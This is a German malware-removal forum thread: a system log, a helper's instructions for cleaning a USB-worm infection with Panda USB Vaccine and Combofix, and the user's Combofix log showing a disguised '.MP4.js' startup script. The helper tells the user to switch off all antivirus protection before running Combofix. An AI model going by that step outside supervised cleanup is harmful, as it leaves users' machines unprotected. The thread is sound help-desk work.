  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.206
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.082
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.715
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.704
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.698
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.691
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.568
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginAppBg.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 18:47:32.731
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_microsoft-windows-s..trics-sensoradapter_31bf3856ad364e35_6.3.9600.17415_none_04bcc3084936a7f6\winbiosensoradapter.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: AMD FX(tm)-4100 Quad-Core Processor 
Prozentuale Nutzung des RAM: 22%
Installierter physikalischer RAM: 16341.65 MB
Verfügbarer physikalischer RAM: 12650.38 MB
Summe virtueller Speicher: 32681.5 MB
Verfügbarer virtueller Speicher: 28729.64 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:94.93 GB) NTFS
Drive d: (FREECOM HDD) (Fixed) (Total:931.51 GB) (Free:81.67 GB) NTFS
Drive f: () (Fixed) (Total:218.94 GB) (Free:189.14 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive g: (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive h: (Media) (Fixed) (Total:3725.9 GB) (Free:180.97 GB) NTFS
Drive i: (Festplatte) (Fixed) (Total:931.51 GB) (Free:401.03 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive l: (World of Goo) (CDROM) (Total:0.07 GB) (Free:0 GB) CDFS
Drive o: () (Removable) (Total:0.98 GB) (Free:0.06 GB) FAT
Drive r: () (Fixed) (Total:19.53 GB) (Free:19.48 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: A83AA10F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 3726 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 21019E80)
Partition 1: (Active) - (Size=218.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=19.5 GB) - (Type=07 NTFS)

========================================================
Disk: 3 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: A2557FE6)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 8 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 21019E81)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 9 (Size: 1008.8 MB) (Disk ID: 001B25E3)
Partition 1: (Active) - (Size=1009 MB) - (Type=06)

==================== Ende von Addition.txt ============================

deeprybka · 09.04.2016, 17:04

Hi, wo ist der Link, bzw. wo haste noch gepostet?

Bitte nur hier mitarbeiten. Wir sind eh die BESTEN.

Schritt 1

Download & Anleitung

Das Tool auf den Desktop abspeichern und als Administrator starten.
Option C auswählen und Panda USB-Vaccine installieren.
Impfe Deinen PC
Den infizierten USB-Stick anstecken.
Option A auswählen.
Option B auswählen. (Nur den Laufwerks-Buchstaben des USB-Sticks eingeben!)
Option B mit allen betroffenen Sticks, Platten durchführen.

Schritt 2
Echtzeitschutz des Virenscanners abschalten.

Schritt 3

Scan mit Combofix

WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link

WICHTIG: Speichere Combofix auf deinem Desktop.

Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.

Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.

Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!

Wenn Combofix fertig ist, wird es ein Logfile erstellen.

Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).

Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

Buggerns · 09.04.2016, 18:00

Hi Jürgen,

der Link wird irgendwie nicht angezeigt, sorry. Habe aber wie gesagt nur gepostet und mich dann fürs Crossposting entschuldigt, mehr nicht.

Die Schritte habe ich alle durchgeführt, der USB-Stick konnte von Panda leider wegen Avira nicht geimpft werden, durch den Remover ist die Verknüpfungssache aber schonmal behoben. Combofix hat beim ersten Mal jedoch den PC neu gestartet und - womöglich weil Avira direkt wieder ansprang und Fenster sich öffneten - nur einen leeren errorlog.txt angezeigt, beim zweiten Mal dann bekam ich diese Logdatei:

Code:

ATTFilter

ComboFix 16-04-06.01 - Ben 09.04.2016  18:41:53.2.4 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.49.1031.18.16342.13630 [GMT 2:00]
ausgeführt von:: c:\users\Ben\Desktop\ComboFix.exe
AV: Avira Antivirus *Disabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Antivirus *Disabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Vorheriger Suchlauf -------
.
c:\users\Ben\AppData\Local\Temp\avgnt.exe\Avira.OE.ExtApi.dll
c:\users\Ben\AppData\Roaming\SpeedRunnersLog.txt
c:\users\Ben\AppData\Roaming\TargetInvocationLog.txt
I:\Autorun.inf
I:\install.exe
I:\setup.exe
.
.
(((((((((((((((((((((((   Dateien erstellt von 2016-03-09 bis 2016-04-09  ))))))))))))))))))))))))))))))
.
.
2016-04-09 16:49 . 2016-04-09 16:49	--------	d-----w-	c:\users\Default\AppData\Local\temp
2016-04-09 16:18 . 2016-04-09 16:18	--------	d-----w-	C:\Rem-VBSqt
2016-04-09 16:17 . 2016-04-09 16:17	--------	d-----w-	c:\programdata\Panda Security
2016-04-09 16:16 . 2016-04-09 16:16	--------	d-----w-	c:\program files (x86)\Panda USB Vaccine
2016-04-09 15:36 . 2016-04-09 15:40	--------	d-----w-	C:\FRST
2016-04-09 13:57 . 2016-04-09 13:57	--------	d-----w-	c:\program files (x86)\VS Revo Group
2016-04-06 22:13 . 2015-09-10 18:07	55116	--sha-w-	c:\users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-04-09 14:07 . 2015-07-27 14:21	192216	----a-w-	c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-03-11 19:52 . 2013-05-19 22:28	69888	----a-w-	c:\windows\system32\drivers\avnetflt.sys
2016-03-11 19:52 . 2013-05-19 22:28	154816	----a-w-	c:\windows\system32\drivers\avgntflt.sys
2016-03-11 19:52 . 2013-05-19 22:28	133168	----a-w-	c:\windows\system32\drivers\avipbb.sys
2016-03-10 12:09 . 2015-07-27 14:20	64896	----a-w-	c:\windows\system32\drivers\mwac.sys
2016-03-10 12:08 . 2015-07-27 14:20	140672	----a-w-	c:\windows\system32\drivers\mbamchameleon.sys
2016-03-10 12:08 . 2015-07-27 14:20	27008	----a-w-	c:\windows\system32\drivers\mbam.sys
2016-03-06 20:31 . 2012-02-19 15:10	146614896	----a-w-	c:\windows\system32\MRT.exe
2016-02-19 19:02 . 2016-03-06 20:05	38336	----a-w-	c:\windows\system32\CompatTelRunner.exe
2016-02-19 18:54 . 2016-03-06 20:05	1168896	----a-w-	c:\windows\system32\aeinv.dll
2016-02-19 14:07 . 2016-03-06 20:05	1373184	----a-w-	c:\windows\system32\appraiser.dll
2016-02-12 18:52 . 2016-03-06 20:07	98816	----a-w-	c:\windows\system32\wudriver.dll
2016-02-12 18:52 . 2016-03-06 20:07	3169792	----a-w-	c:\windows\system32\wucltux.dll
2016-02-12 18:52 . 2016-03-06 20:07	192512	----a-w-	c:\windows\system32\wuwebv.dll
2016-02-12 18:44 . 2016-03-06 20:07	91136	----a-w-	c:\windows\system32\WinSetupUI.dll
2016-02-12 18:39 . 2016-03-06 20:07	174080	----a-w-	c:\windows\SysWow64\wuwebv.dll
2016-02-12 18:22 . 2016-03-06 20:07	2610688	----a-w-	c:\windows\system32\wuaueng.dll
2016-02-12 18:19 . 2016-03-06 20:07	709120	----a-w-	c:\windows\system32\wuapi.dll
2016-02-12 18:18 . 2016-03-06 20:07	37888	----a-w-	c:\windows\system32\wuapp.exe
2016-02-12 18:18 . 2016-03-06 20:07	140288	----a-w-	c:\windows\system32\wuauclt.exe
2016-02-12 18:18 . 2016-03-06 20:07	36864	----a-w-	c:\windows\system32\wups.dll
2016-02-12 18:18 . 2016-03-06 20:07	37888	----a-w-	c:\windows\system32\wups2.dll
2016-02-12 18:18 . 2016-03-06 20:07	12288	----a-w-	c:\windows\system32\wu.upgrade.ps.dll
2016-02-12 18:06 . 2016-03-06 20:07	573440	----a-w-	c:\windows\SysWow64\wuapi.dll
2016-02-12 18:05 . 2016-03-06 20:07	93696	----a-w-	c:\windows\SysWow64\wudriver.dll
2016-02-12 18:05 . 2016-03-06 20:07	30208	----a-w-	c:\windows\SysWow64\wups.dll
2016-02-12 18:05 . 2016-03-06 20:07	35328	----a-w-	c:\windows\SysWow64\wuapp.exe
2016-02-11 14:07 . 2016-03-06 20:05	689152	----a-w-	c:\windows\system32\generaltel.dll
2016-02-06 10:48 . 2016-02-09 20:40	25839104	----a-w-	c:\windows\system32\mshtml.dll
2016-02-06 10:32 . 2016-02-09 20:41	2724864	----a-w-	c:\windows\system32\mshtml.tlb
2016-02-06 10:24 . 2016-02-09 20:41	2887680	----a-w-	c:\windows\system32\iertutil.dll
2016-02-06 10:11 . 2016-02-09 20:40	615936	----a-w-	c:\windows\system32\ieui.dll
2016-02-06 10:10 . 2016-02-09 20:40	144384	----a-w-	c:\windows\system32\ieUnatt.exe
2016-02-06 09:54 . 2016-02-09 20:40	2724864	----a-w-	c:\windows\SysWow64\mshtml.tlb
2016-02-06 09:37 . 2016-02-09 20:40	115712	----a-w-	c:\windows\SysWow64\ieUnatt.exe
2016-02-06 09:32 . 2016-02-09 20:40	14458368	----a-w-	c:\windows\system32\ieframe.dll
2016-02-06 09:09 . 2016-02-09 20:40	1547264	----a-w-	c:\windows\system32\urlmon.dll
2016-02-05 14:07 . 2016-03-06 20:05	696832	----a-w-	c:\windows\system32\invagent.dll
2016-02-05 14:07 . 2016-03-06 20:05	499200	----a-w-	c:\windows\system32\devinv.dll
2016-02-05 14:07 . 2016-03-06 20:05	76800	----a-w-	c:\windows\system32\acmigration.dll
2016-01-22 20:31 . 2016-02-09 21:08	387784	----a-w-	c:\windows\system32\iedkcs32.dll
2016-01-22 06:56 . 2016-02-09 21:08	4096	----a-w-	c:\windows\system32\ieetwcollectorres.dll
2016-01-22 06:41 . 2016-02-09 21:08	66560	----a-w-	c:\windows\system32\iesetup.dll
2016-01-22 06:40 . 2016-02-09 21:09	48640	----a-w-	c:\windows\system32\ieetwproxystub.dll
2016-01-22 06:40 . 2016-02-09 21:08	417792	----a-w-	c:\windows\system32\html.iec
2016-01-22 06:40 . 2016-02-09 21:08	88064	----a-w-	c:\windows\system32\MshtmlDac.dll
2016-01-22 06:40 . 2016-02-09 21:08	571904	----a-w-	c:\windows\system32\vbscript.dll
2016-01-22 06:33 . 2016-02-09 21:08	54784	----a-w-	c:\windows\system32\jsproxy.dll
2016-01-22 06:32 . 2016-02-09 21:09	34304	----a-w-	c:\windows\system32\iernonce.dll
2016-01-22 06:29 . 2016-02-09 21:08	6052352	----a-w-	c:\windows\system32\jscript9.dll
2016-01-22 06:27 . 2016-02-09 21:09	114688	----a-w-	c:\windows\system32\ieetwcollector.exe
2016-01-22 06:27 . 2016-02-09 21:08	817664	----a-w-	c:\windows\system32\jscript.dll
2016-01-22 06:27 . 2016-02-09 21:08	814080	----a-w-	c:\windows\system32\jscript9diag.dll
2016-01-22 06:27 . 2016-02-09 19:49	5573056	----a-w-	c:\windows\system32\ntoskrnl.exe
2016-01-22 06:27 . 2016-02-09 19:49	154560	----a-w-	c:\windows\system32\drivers\ksecpkg.sys
2016-01-22 06:27 . 2016-02-09 19:49	95680	----a-w-	c:\windows\system32\drivers\ksecdd.sys
2016-01-22 06:24 . 2016-02-09 19:49	1733592	----a-w-	c:\windows\system32\ntdll.dll
2016-01-22 06:20 . 2016-02-09 19:49	362496	----a-w-	c:\windows\system32\wow64win.dll
2016-01-22 06:20 . 2016-02-09 19:49	243712	----a-w-	c:\windows\system32\wow64.dll
2016-01-22 06:20 . 2016-02-09 19:49	13312	----a-w-	c:\windows\system32\wow64cpu.dll
2016-01-22 06:20 . 2016-02-09 19:49	215040	----a-w-	c:\windows\system32\winsrv.dll
2016-01-22 06:20 . 2016-02-09 21:08	968704	----a-w-	c:\windows\system32\MsSpellCheckingFacility.exe
2016-01-22 06:20 . 2016-02-09 19:49	210432	----a-w-	c:\windows\system32\wdigest.dll
2016-01-22 06:20 . 2016-02-09 19:49	86528	----a-w-	c:\windows\system32\TSpkg.dll
2016-01-22 06:20 . 2016-02-09 19:49	135680	----a-w-	c:\windows\system32\sspicli.dll
2016-01-22 06:20 . 2016-02-09 19:49	28672	----a-w-	c:\windows\system32\sspisrv.dll
2016-01-22 06:20 . 2016-02-09 19:49	503808	----a-w-	c:\windows\system32\srcore.dll
2016-01-22 06:20 . 2016-02-09 19:49	50176	----a-w-	c:\windows\system32\srclient.dll
2016-01-22 06:19 . 2016-02-09 19:43	14179840	----a-w-	c:\windows\system32\shell32.dll
2016-01-22 06:19 . 2016-02-09 19:49	28160	----a-w-	c:\windows\system32\secur32.dll
2016-01-22 06:19 . 2016-02-09 19:49	344064	----a-w-	c:\windows\system32\schannel.dll
2016-01-22 06:19 . 2016-02-09 19:49	1214464	----a-w-	c:\windows\system32\rpcrt4.dll
2016-01-22 06:18 . 2016-02-09 19:49	961024	----a-w-	c:\windows\system32\CPFilters.dll
2016-01-22 06:18 . 2016-02-09 19:49	723968	----a-w-	c:\windows\system32\EncDec.dll
2016-01-22 06:18 . 2016-02-09 19:49	16384	----a-w-	c:\windows\system32\ntvdm64.dll
2016-01-22 06:17 . 2016-02-09 21:08	489984	----a-w-	c:\windows\system32\dxtmsft.dll
2016-01-22 06:17 . 2016-02-09 19:49	312320	----a-w-	c:\windows\system32\ncrypt.dll
2016-01-22 06:17 . 2016-02-09 19:49	159744	----a-w-	c:\windows\system32\mtxoci.dll
2016-01-22 06:17 . 2016-02-09 19:49	315392	----a-w-	c:\windows\system32\msv1_0.dll
2016-01-22 06:16 . 2016-02-09 19:49	60416	----a-w-	c:\windows\system32\msobjs.dll
2016-01-22 06:16 . 2016-02-09 19:49	146432	----a-w-	c:\windows\system32\msaudite.dll
2016-01-22 06:16 . 2016-02-09 19:49	1461248	----a-w-	c:\windows\system32\lsasrv.dll
2016-01-22 06:15 . 2016-02-09 19:49	730112	----a-w-	c:\windows\system32\kerberos.dll
2016-01-22 06:15 . 2016-02-09 19:49	422400	----a-w-	c:\windows\system32\KernelBase.dll
2016-01-22 06:15 . 2016-02-09 19:49	1163264	----a-w-	c:\windows\system32\kernel32.dll
2016-01-22 06:15 . 2016-02-09 19:43	1866752	----a-w-	c:\windows\system32\ExplorerFrame.dll
2016-01-22 06:13 . 2016-02-09 19:49	3993536	----a-w-	c:\windows\SysWow64\ntkrnlpa.exe
2016-01-22 06:13 . 2016-02-09 19:49	3938752	----a-w-	c:\windows\SysWow64\ntoskrnl.exe
2016-01-22 06:13 . 2016-02-09 19:49	43520	----a-w-	c:\windows\system32\csrsrv.dll
2016-01-22 06:13 . 2016-02-09 19:49	43520	----a-w-	c:\windows\system32\cryptbase.dll
2016-01-22 06:13 . 2016-02-09 19:49	22016	----a-w-	c:\windows\system32\credssp.dll
2016-01-22 06:12 . 2016-02-09 19:43	1940992	----a-w-	c:\windows\system32\authui.dll
2016-01-22 06:12 . 2016-02-09 19:49	6656	----a-w-	c:\windows\system32\apisetschema.dll
2016-01-22 06:12 . 2016-02-09 19:49	6144	---ha-w-	c:\windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-01-22 06:12 . 2016-02-09 19:49	3072	---ha-w-	c:\windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-01-22 06:12 . 2016-02-09 19:49	3072	---ha-w-	c:\windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-01-22 06:12 . 2016-02-09 19:49	880128	----a-w-	c:\windows\system32\advapi32.dll
2016-01-22 06:12 . 2016-02-09 19:49	686080	----a-w-	c:\windows\system32\adtschema.dll
2016-01-22 06:12 . 2016-02-09 19:49	5120	---ha-w-	c:\windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-01-22 06:12 . 2016-02-09 19:49	4608	---ha-w-	c:\windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files (x86)\Windows Sidebar\sidebar.exe" [2010-11-21 1174016]
"DAEMON Tools Lite"="c:\program files (x86)\DAEMON Tools Lite\DTLite.exe" [2013-03-14 3672640]
"Steam"="c:\program files (x86)\Steam\steam.exe" [2016-03-31 3077712]
"GoogleChromeAutoLaunch_8B4B86C2A5661DC92D9A84E265233F91"="c:\users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe" [2016-03-27 874136]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"THX TruStudio NB Settings"="c:\program files (x86)\Creative\THX TruStudio\THXNBSet\THXAudNB.exe" [2011-05-19 909824]
"UpdReg"="c:\windows\UpdReg.EXE" [2000-05-11 90112]
"DivXUpdate"="c:\program files (x86)\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-20 59240]
"Cisco AnyConnect Secure Mobility Agent for Windows"="c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe" [2012-12-10 527864]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2016-03-11 807392]
"StartCCC"="c:\program files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" [2015-07-28 767176]
"Avira SystrayStartTrigger"="c:\program files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe" [2016-01-27 66328]
"Wondershare Helper Compact.exe"="c:\program files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe" [2014-02-20 1994752]
"VID-20151943-WA0114"="wscript.exe" [2013-10-12 141824]
.
c:\users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
errorlog.txt [2016-4-9 0]
OpenOffice.org 3.3.lnk - c:\program files (x86)\OpenOffice.org 3\program\quickstart.exe [2010-12-13 1198592]
VID-20151943-WA0114.MP4.js [2015-9-10 55116]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Adobe Gamma.lnk - c:\program files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-3-16 113664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
R2 AntiVirMailService;Avira Email-Schutz;c:\program files (x86)\Avira\AntiVir Desktop\avmailc7.exe;c:\program files (x86)\Avira\AntiVir Desktop\avmailc7.exe [x]
R2 AntiVirWebService;Avira Browser-Schutz;c:\program files (x86)\Avira\AntiVir Desktop\avwebg7.exe;c:\program files (x86)\Avira\AntiVir Desktop\avwebg7.exe [x]
R2 AODDriver4.01;AODDriver4.01;c:\program files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys;c:\program files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 acsock;acsock;c:\windows\system32\DRIVERS\acsock64.sys;c:\windows\SYSNATIVE\DRIVERS\acsock64.sys [x]
R3 amdiox64;AMD IO Driver;c:\windows\system32\DRIVERS\amdiox64.sys;c:\windows\SYSNATIVE\DRIVERS\amdiox64.sys [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
S0 sptd;sptd;c:\windows\\SystemRoot\System32\Drivers\sptd.sys;c:\windows\\SystemRoot\System32\Drivers\sptd.sys [x]
S1 AsrAppCharger;AsrAppCharger;c:\windows\system32\DRIVERS\AsrAppCharger.sys;c:\windows\SYSNATIVE\DRIVERS\AsrAppCharger.sys [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\DRIVERS\dtsoftbus01.sys;c:\windows\SYSNATIVE\DRIVERS\dtsoftbus01.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AMD FUEL Service;AMD FUEL Service;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AODDriver4.3;AODDriver4.3;c:\program files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys;c:\program files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [x]
S2 Avira.ServiceHost;Avira Service Host;c:\program files (x86)\Avira\Launcher\Avira.ServiceHost.exe;c:\program files (x86)\Avira\Launcher\Avira.ServiceHost.exe [x]
S2 avnetflt;avnetflt;c:\windows\system32\DRIVERS\avnetflt.sys;c:\windows\SYSNATIVE\DRIVERS\avnetflt.sys [x]
S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
S2 vpnagent;Cisco AnyConnect Secure Mobility Agent;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 EtronHub3;Etron USB 3.0 Extensible Hub Driver;c:\windows\system32\Drivers\EtronHub3.sys;c:\windows\SYSNATIVE\Drivers\EtronHub3.sys [x]
S3 EtronXHCI;Etron USB 3.0 Extensible Host Controller Driver;c:\windows\system32\Drivers\EtronXHCI.sys;c:\windows\SYSNATIVE\Drivers\EtronXHCI.sys [x]
S3 MBfilt;MBfilt;c:\windows\system32\drivers\MBfilt64.sys;c:\windows\SYSNATIVE\drivers\MBfilt64.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 usbfilter;AMD USB Filter Driver;c:\windows\system32\DRIVERS\usbfilter.sys;c:\windows\SYSNATIVE\DRIVERS\usbfilter.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - WS2IFSL
.
Inhalt des "geplante Tasks" Ordners
.
2016-04-09 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-02-20 13:52]
.
2016-04-09 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-02-20 13:52]
.
2016-04-08 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core.job
- c:\users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-31 15:00]
.
2016-04-09 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA.job
- c:\users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-31 15:00]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2011-05-18 11855976]
"THXCfg64"="c:\windows\system32\THXCfg64.dll" [2011-05-13 26624]
.
------- Zusätzlicher Suchlauf -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com
uDefault_Search_URL = hxxp://www.google.com
mDefault_Search_URL = hxxp://www.google.com
mDefault_Page_URL = hxxp://www.google.com
mStart Page = hxxp://www.google.com
mLocal Page = c:\windows\SysWOW64\blank.htm
